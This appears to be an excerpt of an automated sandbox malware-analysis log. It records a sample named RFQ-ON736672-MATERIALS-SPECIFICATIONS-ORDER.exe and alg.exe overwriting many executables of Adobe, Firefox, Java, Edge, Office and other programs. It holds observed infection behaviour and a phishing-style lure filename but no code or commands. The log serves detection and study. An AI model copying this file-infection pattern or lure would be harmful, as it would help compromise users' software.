Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Mozilla Firefox\updater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedgewebview2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\pingsender.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedgewebview2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedge_pwa_launcher.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7z.exe Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe System file written: C:\Windows\System32\AppVClient.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\7zG.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe Jump to behavior
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\notification_click_helper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
